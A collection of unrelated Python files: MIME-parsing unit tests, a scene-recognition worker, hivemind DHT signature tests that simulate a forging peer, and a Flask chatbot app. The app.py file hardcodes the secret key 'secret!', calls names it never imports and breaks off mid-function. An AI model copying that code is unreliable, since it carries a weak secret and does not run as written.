name, attrs = utils.parse_content_disposition('text/plain')
self.assertEqual(name, 'text/plain')
self.assertEqual(attrs, {})
def test_content_type_with_charset(self):
name, attrs = utils.parse_content_disposition(
'text/plain; charset=UTF8')
self.assertEqual(name, 'text/plain')
self.assertEqual(attrs, {'charset': 'UTF8'})
def test_content_disposition(self):
name, attrs = utils.parse_content_disposition(
'form-data; name="somefile"; filename="test.html"')
self.assertEqual(name, 'form-data')
self.assertEqual(attrs, {'name': 'somefile', 'filename': 'test.html'})
def test_content_disposition_without_white_space(self):
name, attrs = utils.parse_content_disposition(
'form-data;name="somefile";filename="test.html"')
self.assertEqual(name, 'form-data')
self.assertEqual(attrs, {'name': 'somefile', 'filename': 'test.html'})
class TestIterMultipartMimeDocuments(unittest.TestCase):
def test_bad_start(self):
it = utils.iter_multipart_mime_documents(StringIO('blah'), 'unique')
exc = None
try:
next(it)
except MimeInvalid as err:
exc = err
self.assertTrue('invalid starting boundary' in str(exc))
self.assertTrue('--unique' in str(exc))
def test_empty(self):
it = utils.iter_multipart_mime_documents(StringIO('--unique'),
'unique')
fp = next(it)
self.assertEqual(fp.read(), '')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_basic(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabcdefg\r\n--unique--'), 'unique')
fp = next(it)
self.assertEqual(fp.read(), 'abcdefg')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_basic2(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabcdefg\r\n--unique\r\nhijkl\r\n--unique--'),
'unique')
fp = next(it)
self.assertEqual(fp.read(), 'abcdefg')
fp = next(it)
self.assertEqual(fp.read(), 'hijkl')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_tiny_reads(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabcdefg\r\n--unique\r\nhijkl\r\n--unique--'),
'unique')
fp = next(it)
self.assertEqual(fp.read(2), 'ab')
self.assertEqual(fp.read(2), 'cd')
self.assertEqual(fp.read(2), 'ef')
self.assertEqual(fp.read(2), 'g')
self.assertEqual(fp.read(2), '')
fp = next(it)
self.assertEqual(fp.read(), 'hijkl')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_big_reads(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabcdefg\r\n--unique\r\nhijkl\r\n--unique--'),
'unique')
fp = next(it)
self.assertEqual(fp.read(65536), 'abcdefg')
self.assertEqual(fp.read(), '')
fp = next(it)
self.assertEqual(fp.read(), 'hijkl')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_leading_crlfs(self):
it = utils.iter_multipart_mime_documents(
StringIO('\r\n\r\n\r\n--unique\r\nabcdefg\r\n'
'--unique\r\nhijkl\r\n--unique--'),
'unique')
fp = next(it)
self.assertEqual(fp.read(65536), 'abcdefg')
self.assertEqual(fp.read(), '')
fp = next(it)
self.assertEqual(fp.read(), 'hijkl')
self.assertRaises(StopIteration, it.next)
def test_broken_mid_stream(self):
# We go ahead and accept whatever is sent instead of rejecting the
# whole request, in case the partial form is still useful.
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabc'), 'unique')
fp = next(it)
self.assertEqual(fp.read(), 'abc')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_readline(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nab\r\ncd\ref\ng\r\n--unique\r\nhi\r\n\r\n'
'jkl\r\n\r\n--unique--'), 'unique')
fp = next(it)
self.assertEqual(fp.readline(), 'ab\r\n')
self.assertEqual(fp.readline(), 'cd\ref\ng')
self.assertEqual(fp.readline(), '')
fp = next(it)
self.assertEqual(fp.readline(), 'hi\r\n')
self.assertEqual(fp.readline(), '\r\n')
self.assertEqual(fp.readline(), 'jkl\r\n')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_readline_with_tiny_chunks(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nab\r\ncd\ref\ng\r\n--unique\r\nhi\r\n'
'\r\njkl\r\n\r\n--unique--'),
'unique',
read_chunk_size=2)
fp = next(it)
self.assertEqual(fp.readline(), 'ab\r\n')
self.assertEqual(fp.readline(), 'cd\ref\ng')
self.assertEqual(fp.readline(), '')
fp = next(it)
self.assertEqual(fp.readline(), 'hi\r\n')
self.assertEqual(fp.readline(), '\r\n')
self.assertEqual(fp.readline(), 'jkl\r\n')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
class TestParseMimeHeaders(unittest.TestCase):
def test_parse_mime_headers(self):
doc_file = BytesIO(b"""Content-Disposition: form-data; name="file_size"
Foo: Bar
NOT-title-cAsED: quux
Connexion: =?iso8859-1?q?r=E9initialis=E9e_par_l=27homologue?=
Status: =?utf-8?b?5byA5aeL6YCa6L+H5a+56LGh5aSN5Yi2?=
Latin-1: Resincronizaci\xf3n realizada con \xe9xito
Utf-8: \xd0\xba\xd0\xbe\xd0\xbd\xd1\x82\xd0\xb5\xd0\xb9\xd0\xbd\xd0\xb5\xd1\x80
This is the body
""")
headers = utils.parse_mime_headers(doc_file)
utf8 = u'\u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440'
if six.PY2:
utf8 = utf8.encode('utf-8')
expected_headers = {
'Content-Disposition': 'form-data; name="file_size"',
'Foo': "Bar",
'Not-Title-Cased': "quux",
# Encoded-word or non-ASCII values are treated just like any other
# bytestring (at least for now)
'Connexion': "=?iso8859-1?q?r=E9initialis=E9e_par_l=27homologue?=",
'Status': "=?utf-8?b?5byA5aeL6YCa6L+H5a+56LGh5aSN5Yi2?=",
'Latin-1': "Resincronizaci\xf3n realizada con \xe9xito",
'Utf-8': utf8,
}
self.assertEqual(expected_headers, headers)
self.assertEqual(b"This is the body\n", doc_file.read())
class FakeResponse(object):
def __init__(self, status, headers, body):
self.status = status
self.headers = HeaderKeyDict(headers)
self.body = StringIO(body)
def getheader(self, header_name):
return str(self.headers.get(header_name, ''))
def getheaders(self):
return self.headers.items()
def read(self, length=None):
return self.body.read(length)
def readline(self, length=None):
return self.body.readline(length)
class TestDocumentItersToHTTPResponseBody(unittest.TestCase):
def test_no_parts(self):
body = utils.document_iters_to_http_response_body(
iter([]), 'dontcare',
multipart=False, logger=FakeLogger())
self.assertEqual(body, '')
def test_single_part(self):
body = "time flies like an arrow; fruit flies like a banana"
doc_iters = [{'part_iter': iter(StringIO(body).read, '')}]
resp_body = ''.join(
utils.document_iters_to_http_response_body(
iter(doc_iters), 'dontcare',
multipart=False, logger=FakeLogger()))
self.assertEqual(resp_body, body)
def test_multiple_parts(self):
part1 = "two peanuts were walking down a railroad track"
part2 = "and one was a salted. ... peanut."
doc_iters = [{
'start_byte': 88,
'end_byte': 133,
'content_type': 'application/peanut',
'entity_length': 1024,
'part_iter': iter(StringIO(part1).read, ''),
}, {
'start_byte': 500,
'end_byte': 532,
'content_type': 'application/salted',
'entity_length': 1024,
'part_iter': iter(StringIO(part2).read, ''),
}]
resp_body = ''.join(
utils.document_iters_to_http_response_body(
iter(doc_iters), 'boundaryboundary',
multipart=True, logger=FakeLogger()))
self.assertEqual(resp_body, (
"--boundaryboundary\r\n" +
# This is a little too strict; we don't actually care that the
# headers are in this order, but the test is much more legible
# this way.
"Content-Type: application/peanut\r\n" +
"Content-Range: bytes 88-133/1024\r\n" +
"\r\n" +
part1 + "\r\n" +
"--boundaryboundary\r\n"
"Content-Type: application/salted\r\n" +
"Content-Range: bytes 500-532/1024\r\n" +
"\r\n" +
part2 + "\r\n" +
"--boundaryboundary--"))
class TestPairs(unittest.TestCase):
def test_pairs(self):
items = [10, 20, 30, 40, 50, 60]
got_pairs = set(utils.pairs(items))
self.assertEqual(got_pairs,
set([(10, 20), (10, 30), (10, 40), (10, 50), (10, 60),
(20, 30), (20, 40), (20, 50), (20, 60),
(30, 40), (30, 50), (30, 60),
(40, 50), (40, 60),
(50, 60)]))
class TestSocketStringParser(unittest.TestCase):
def test_socket_string_parser(self):
default = 1337
addrs = [('1.2.3.4', '1.2.3.4', default),
('1.2.3.4:5000', '1.2.3.4', 5000),
('[dead:beef::1]', 'dead:beef::1', default),
('[dead:beef::1]:5000', 'dead:beef::1', 5000),
('example.com', 'example.com', default),
('example.com:5000', 'example.com', 5000),
('foo.1-2-3.bar.com:5000', 'foo.1-2-3.bar.com', 5000),
('1.2.3.4:10:20', None, None),
('dead:beef::1:5000', None, None)]
for addr, expected_host, expected_port in addrs:
if expected_host:
host, port = utils.parse_socket_string(addr, default)
self.assertEqual(expected_host, host)
self.assertEqual(expected_port, int(port))
else:
with self.assertRaises(ValueError):
utils.parse_socket_string(addr, default)
if __name__ == '__main__':
unittest.main()
|
scene.py
|
import _thread as thread
import ast
import io
import json
import os
import sqlite3
import sys
import time
import warnings
from multiprocessing import Process
sys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)), "."))
from shared import SharedOptions
if SharedOptions.PROFILE == "windows_native":
sys.path.append(os.path.join(SharedOptions.APP_DIR,"windows_packages"))
import numpy as np
import onnxruntime as rt
import torch
import torch.nn.functional as F
from PIL import Image, UnidentifiedImageError
import traceback
import torchvision.transforms as transforms
class SceneModel(object):
def __init__(self, model_path, cuda=False):
self.sess = rt.InferenceSession(model_path)
self.input_name = self.sess.get_inputs()[0].name
def predict(self, image_tensors):
out = self.sess.run(None, {self.input_name: image_tensors})
out = np.array(out)
torch_out = torch.from_numpy(out).squeeze(1)
torch_out = torch.softmax(torch_out, 1)
return out.argmax(), torch_out.max().item()
def scenerecognition(thread_name, delay):
classes = list()
with open(
os.path.join(SharedOptions.SHARED_APP_DIR, "categories_places365.txt")
) as class_file:
for line in class_file:
classes.append(line.strip().split(" ")[0][3:])
placesnames = tuple(classes)
IMAGE_QUEUE = "scene_queue"
classifier = SceneModel(
os.path.join(SharedOptions.SHARED_APP_DIR, "scene.model"),
SharedOptions.CUDA_MODE,
)
while True:
queue = SharedOptions.db.lrange(IMAGE_QUEUE, 0, 0)
if len(queue) > 0:
SharedOptions.db.ltrim(IMAGE_QUEUE, len(queue), -1)
for req_data in queue:
req_data = json.JSONDecoder().decode(req_data)
img_id = req_data["imgid"]
req_id = req_data["reqid"]
req_type = req_data["reqtype"]
img_path = os.path.join(SharedOptions.TEMP_PATH,img_id)
try:
img = Image.open(img_path).convert("RGB")
trans = transforms.Compose(
[
transforms.Resize((256, 256)),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(
[0.485, 0.456, 0.406], [0.229, 0.224, 0.225]
),
]
)
img = trans(img)
img = img.numpy()
img = np.expand_dims(img, 0).astype(np.float32)
os.remove(img_path)
cl, conf = classifier.predict(img)
cl = placesnames[cl]
conf = float(conf)
output = {"success": True, "label": cl, "confidence": conf}
except UnidentifiedImageError:
err_trace = traceback.format_exc()
print(err_trace, file=sys.stderr, flush=True)
output = {
"success": False,
"error": "error occured on the server",
"code": 400,
}
except Exception:
err_trace = traceback.format_exc()
print(err_trace, file=sys.stderr, flush=True)
output = {"success": False, "error": "invalid image", "code": 500}
finally:
SharedOptions.db.set(req_id, json.dumps(output))
if os.path.exists(img_path):
os.remove(img_path)
time.sleep(delay)
if __name__ == "__main__":
p = Process(target=scenerecognition, args=("", SharedOptions.SLEEP_TIME))
p.start()
|
test_dht_crypto.py
|
import dataclasses
import multiprocessing as mp
import pickle
import pytest
import hivemind
from hivemind.dht.crypto import RSASignatureValidator
from hivemind.dht.node import DHTNode
from hivemind.dht.validation import DHTRecord
from hivemind.utils.crypto import RSAPrivateKey
from hivemind.utils.timed_storage import get_dht_time
def test_rsa_signature_validator():
receiver_validator = RSASignatureValidator()
sender_validator = RSASignatureValidator(RSAPrivateKey())
mallory_validator = RSASignatureValidator(RSAPrivateKey())
plain_record = DHTRecord(key=b"key", subkey=b"subkey", value=b"value", expiration_time=get_dht_time() + 10)
protected_records = [
dataclasses.replace(plain_record, key=plain_record.key + sender_validator.local_public_key),
dataclasses.replace(plain_record, subkey=plain_record.subkey + sender_validator.local_public_key),
]
# test 1: Non-protected record (no signature added)
assert sender_validator.sign_value(plain_record) == plain_record.value
assert receiver_validator.validate(plain_record)
# test 2: Correct signatures
signed_records = [
dataclasses.replace(record, value=sender_validator.sign_value(record)) for record in protected_records
]
for record in signed_records:
assert receiver_validator.validate(record)
assert receiver_validator.strip_value(record) == b"value"
# test 3: Invalid signatures
signed_records = protected_records # Without signature
signed_records += [
dataclasses.replace(record, value=record.value + b"[signature:INVALID_BYTES]") for record in protected_records
] # With invalid signature
signed_records += [
dataclasses.replace(record, value=mallory_validator.sign_value(record)) for record in protected_records
] # With someone else's signature
for record in signed_records:
assert not receiver_validator.validate(record)
def test_cached_key():
first_validator = RSASignatureValidator()
second_validator = RSASignatureValidator()
assert first_validator.local_public_key == second_validator.local_public_key
third_validator = RSASignatureValidator(RSAPrivateKey())
assert first_validator.local_public_key != third_validator.local_public_key
def test_validator_instance_is_picklable():
# Needs to be picklable because the validator instance may be sent between processes
original_validator = RSASignatureValidator()
unpickled_validator = pickle.loads(pickle.dumps(original_validator))
# To check that the private key was pickled and unpickled correctly, we sign a record
# with the original public key using the unpickled validator and then validate the signature
record = DHTRecord(
key=b"key",
subkey=b"subkey" + original_validator.local_public_key,
value=b"value",
expiration_time=get_dht_time() + 10,
)
signed_record = dataclasses.replace(record, value=unpickled_validator.sign_value(record))
assert b"[signature:" in signed_record.value
assert original_validator.validate(signed_record)
assert unpickled_validator.validate(signed_record)
def get_signed_record(conn: mp.connection.Connection) -> DHTRecord:
validator = conn.recv()
record = conn.recv()
record = dataclasses.replace(record, value=validator.sign_value(record))
conn.send(record)
return record
def test_signing_in_different_process():
parent_conn, child_conn = mp.Pipe()
process = mp.Process(target=get_signed_record, args=[child_conn])
process.start()
validator = RSASignatureValidator()
parent_conn.send(validator)
record = DHTRecord(
key=b"key", subkey=b"subkey" + validator.local_public_key, value=b"value", expiration_time=get_dht_time() + 10
)
parent_conn.send(record)
signed_record = parent_conn.recv()
assert b"[signature:" in signed_record.value
assert validator.validate(signed_record)
@pytest.mark.forked
@pytest.mark.asyncio
async def test_dhtnode_signatures():
alice = await DHTNode.create(record_validator=RSASignatureValidator())
initial_peers = await alice.get_visible_maddrs()
bob = await DHTNode.create(record_validator=RSASignatureValidator(RSAPrivateKey()), initial_peers=initial_peers)
mallory = await DHTNode.create(
record_validator=RSASignatureValidator(RSAPrivateKey()), initial_peers=initial_peers
)
key = b"key"
subkey = b"protected_subkey" + bob.protocol.record_validator.local_public_key
assert await bob.store(key, b"true_value", hivemind.get_dht_time() + 10, subkey=subkey)
assert (await alice.get(key, latest=True)).value[subkey].value == b"true_value"
store_ok = await mallory.store(key, b"fake_value", hivemind.get_dht_time() + 10, subkey=subkey)
assert not store_ok
assert (await alice.get(key, latest=True)).value[subkey].value == b"true_value"
assert await bob.store(key, b"updated_true_value", hivemind.get_dht_time() + 10, subkey=subkey)
assert (await alice.get(key, latest=True)).value[subkey].value == b"updated_true_value"
await bob.shutdown() # Bob has shut down, now Mallory is the single peer of Alice
store_ok = await mallory.store(key, b"updated_fake_value", hivemind.get_dht_time() + 10, subkey=subkey)
assert not store_ok
assert (await alice.get(key, latest=True)).value[subkey].value == b"updated_true_value"
|
app.py
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import os
import sys
PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, os.path.abspath(os.path.join(PROJECT_ROOT, "..")))
import argparse
import glob
import os
import random
import signal
import time
import torch
from pytorch_transformers import BertTokenizer
import distributed
from models import data_loader, model_builder
from models.data_loader import load_dataset
from models.loss import abs_loss
from models.model_builder import AbsSummarizer
from models.predictor import build_predictor
from models.trainer import build_trainer
from others.logging import logger, init_logger
model_flags = ['hidden_size', 'ff_size', 'heads', 'emb_size', 'enc_layers', 'enc_hidden_size', 'enc_ff_size',
'dec_layers', 'dec_hidden_size', 'dec_ff_size', 'encoder', 'ff_actv', 'use_interval']
from flask import Flask, request, jsonify
from flask_socketio import SocketIO, emit
app = Flask(__name__)
app.config['SECRET_KEY'] = 'secret!'
socketio = SocketIO(app)
import logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__file__)
# logger.info(pformat(args))
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def train_abs_multi(args):
""" Spawns 1 process per GPU """
init_logger()
nb_gpu = args.world_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = distributed.multi_init(device_id, args.world_size, args.gpu_ranks)
print('gpu_rank %d' % gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
train_abs_single(args, device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def validate_abs(args, device_id):
timestep = 0
if (args.test_all):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
xent_lst = []
for i, cp in enumerate(cp_files):
step = int(cp.split('.')[-2].split('_')[-1])
if (args.test_start_from != -1 and step < args.test_start_from):
xent_lst.append((1e6, cp))
continue
xent = validate(args, device_id, cp, step)
xent_lst.append((xent, cp))
max_step = xent_lst.index(min(xent_lst))
if (i - max_step > 10):
break
xent_lst = sorted(xent_lst, key=lambda x: x[0])[:5]
logger.info('PPL %s' % str(xent_lst))
for xent, cp in xent_lst:
step = int(cp.split('.')[-2].split('_')[-1])
test_abs(args, device_id, cp, step)
else:
while (True):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (not os.path.getsize(cp) > 0):
time.sleep(60)
continue
if (time_of_cp > timestep):
timestep = time_of_cp
step = int(cp.split('.')[-2].split('_')[-1])
validate(args, device_id, cp, step)
test_abs(args, device_id, cp, step)
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (time_of_cp > timestep):
continue
else:
time.sleep(300)
def validate(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = AbsSummarizer(args, device, checkpoint)
model.eval()
valid_iter = data_loader.Dataloader(args, load_dataset(args, 'valid', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=False)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
valid_loss = abs_loss(model.generator, symbols, model.vocab_size, train=False, device=device)
trainer = build_trainer(args, device_id, model, None, valid_loss)
stats = trainer.validate(valid_iter, step)
return stats.xent()
def test_abs(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = AbsSummarizer(args, device, checkpoint)
model.eval()
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.test_batch_size, device,
shuffle=False, is_test=True)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
predictor = build_predictor(args, tokenizer, symbols, model, logger)
predictor.translate(test_iter, step)
def baseline(args, cal_lead=False, cal_oracle=False):
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, 'cpu',
shuffle=False, is_test=True)
trainer = build_trainer(args, '-1', None, None, None)
#
if (cal_lead):
trainer.test(test_iter, 0, cal_lead=True)
elif (cal_oracle):
trainer.test(test_iter, 0, cal_oracle=True)
def train_abs(args, device_id):
if (args.world_size > 1):
train_abs_multi(args)
else:
train_abs_single(args, device_id)
def train_abs_single(args, device_id):
init_logger(args.log_file)
logger.info(str(args))
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
if args.train_from != '':
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
else:
checkpoint = None
if (args.load_from_extractive != ''):
logger.info('Loading bert from extractive model %s' % args.load_from_extractive)
bert_from_extractive = torch.load(args.load_from_extractive, map_location=lambda storage, loc: storage)
bert_from_extractive = bert_from_extractive['model']
else:
bert_from_extractive = None
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
def train_iter_fct():
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True), args.batch_size, device,
shuffle=True, is_test=False)
model = AbsSummarizer(args, device, checkpoint, bert_from_extractive)
if (args.sep_optim):
optim_bert = model_builder.build_optim_bert(args, model, checkpoint)
optim_dec = model_builder.build_optim_dec(args, model, checkpoint)
optim = [optim_bert, optim_dec]
else:
optim = [model_builder.build_optim(args, model, checkpoint)]
logger.info(model)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
train_loss = abs_loss(model.generator, symbols, model.vocab_size, device, train=True,
label_smoothing=args.label_smoothing)
trainer = build_trainer(args, device_id, model, optim, train_loss)
trainer.train(train_iter_fct, args.train_steps)
def test_text_abs(args):
logger.info('Loading checkpoint from %s' % args.test_from)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
checkpoint = torch.load(args.test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = AbsSummarizer(args, device, checkpoint)
model.eval()
test_iter = data_loader.load_text(args, args.text_src, args.text_tgt, device)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
predictor = build_predictor(args, tokenizer, symbols, model, logger)
predictor.translate(test_iter, -1)
class Map(dict):
"""
Example:
m = Map({'first_name': 'Eduardo'}, last_name='Pool', age=24, sports=['Soccer'])
"""
def __init__(self, *args, **kwargs):
super(Map, self).__init__(*args, **kwargs)
for arg in args:
if isinstance(arg, dict):
for k, v in arg.items():
self[k] = v
if kwargs:
for k, v in kwargs.items():
self[k] = v
def __getattr__(self, attr):
return self.get(attr)
def __setattr__(self, key, value):
self.__setitem__(key, value)
def __setitem__(self, key, value):
super(Map, self).__setitem__(key, value)
self.__dict__.update({key: value})
def __delattr__(self, item):
self.__delitem__(item)
def __delitem__(self, key):
super(Map, self).__delitem__(key)
del self.__dict__[key]
@app.route('/')
def hello_world():
return 'Hello World!'
@app.route('/predict', methods=['GET', 'POST'])
def predict():
if request.method == 'POST':
# скопировано из функции def run():, заменен словарь args на фактически распарсенный набор параметров #########
args = {'dataset_path': './persona_2ver_1500pers_en.json',
'dataset_cache': './dataset_cache',
'model': 'openai-gpt',
'model_checkpoint': './runs/Nov23_16-25-39_joo-tf_openai-gpt/',
'max_history': 2,
'device': 'cpu', # cuda
'max_length': 30,
'min_length': 2,
'seed': 0,
'temperature': 0.7,
'top_k': 0,
'top_p': 0.9,
}
args2 = Map(args)
# logging.basicConfig(level=logging.INFO)
# logger = logging.getLogger(__file__)
# logger.info(pformat(args))
if args['model_checkpoint'] == "":
if args['model'] == 'gpt2':
raise ValueError("Interacting with GPT2 requires passing a finetuned model_checkpoint")
else:
args['model_checkpoint'] = download_pretrained_model()
if args['seed'] != 0:
random.seed(args['seed'])
torch.random.manual_seed(args['seed'])
torch.cuda.manual_seed(args['seed'])
logger.info("Get pretrained model and tokenizer")
tokenizer_class, model_class = (GPT2Tokenizer, GPT2LMHeadModel) if args['model'] == 'gpt2' else (
OpenAIGPTTokenizer, OpenAIGPTLMHeadModel)
tokenizer = tokenizer_class.from_pretrained(args['model_checkpoint'])
model = model_class.from_pretrained(args['model_checkpoint'])
model.to(args['device'])
add_special_tokens_(model, tokenizer)
logger.info("Sample a personality")
dataset = get_dataset(tokenizer, args['dataset_path'], args['dataset_cache'])
personalities = [dialog["personality"] for dataset in dataset.values() for dialog in dataset]
# personality = random.choice(personalities)
personality = personalities[1] # the first is about ze
logger.info("Selected personality: %s", tokenizer.decode(chain(*personality)))
###############################################################################################################
# фактический вызов модели путорч на предсказание, из файла interact.py
history = []
raw_text = request.get_json(force=True)['raw_text'] # {"raw_text":"some text to pass in pytorch gpt", "username": "fizz bizz"}
print('########### raw_text: ', raw_text)
while not raw_text:
print('Prompt should not be empty!')
raw_text = input(">>> ")
history.append(tokenizer.encode(raw_text))
with torch.no_grad():
out_ids = interact.sample_sequence(personality, history, tokenizer, model, args2)
history.append(out_ids)
history = history[-(2 * args2.max_history + 1):]
out_text = tokenizer.decode(out_ids, skip_special_tokens=True)
print(out_text)
return jsonify({'q': raw_text, 'a': out_text})
if request.method == 'GET':
# скопировано из функции def run():, заменен словарь args на фактически распарсенный набор параметров #########
args = {'dataset_path': './persona_2ver_1500pers_en.json',
'dataset_cache': './dataset_cache',
'model': 'openai-gpt',
'model_checkpoint': './runs/Nov23_16-25-39_joo-tf_openai-gpt/',
'max_history': 2,
'device': 'cpu', # cuda
'max_length': 30,
'min_length': 2,
'seed': 0,
'temperature': 0.7,
'top_k': 0,
'top_p': 0.9,
}
args2 = Map(args)
# logging.basicConfig(level=logging.INFO)
# logger = logging.getLogger(__file__)
# logger.info(pformat(args))
if args['model_checkpoint'] == "":
if args['model'] == 'gpt2':
raise ValueError("Interacting with GPT2 requires passing a finetuned model_checkpoint")
else:
args['model_checkpoint'] = download_pretrained_model()
if args['seed'] != 0:
random.seed(args['seed'])
torch.random.manual_seed(args['seed'])
torch.cuda.manual_seed(args['seed'])
logger.info("Get pretrained model and tokenizer")
tokenizer_class, model_class = (GPT2Tokenizer, GPT2LMHeadModel) if args['model'] == 'gpt2' else (
OpenAIGPTTokenizer, OpenAIGPTLMHeadModel)
tokenizer = tokenizer_class.from_pretrained(args['model_checkpoint'])
model = model_class.from_pretrained(args['model_checkpoint'])
model.to(args['device'])
add_special_tokens_(model, tokenizer)
logger.info("Sample a personality")
dataset = get_dataset(tokenizer, args['dataset_path'], args['dataset_cache'])
personalities = [dialog["personality"] for dataset in dataset.values() for dialog in dataset]
# personality = random.choice(personalities)
personality = personalities[1] # the first is about ze
logger.info("Selected personality: %s", tokenizer.decode(chain(*personality)))
###############################################################################################################
# фактический вызов модели путорч на предсказание, из файла interact.py
history = []
# raw_text = request.get_json(force=True)['raw_text'] # {"raw_text":"some text to pass in pytorch gpt", "username": "fizz bizz"}
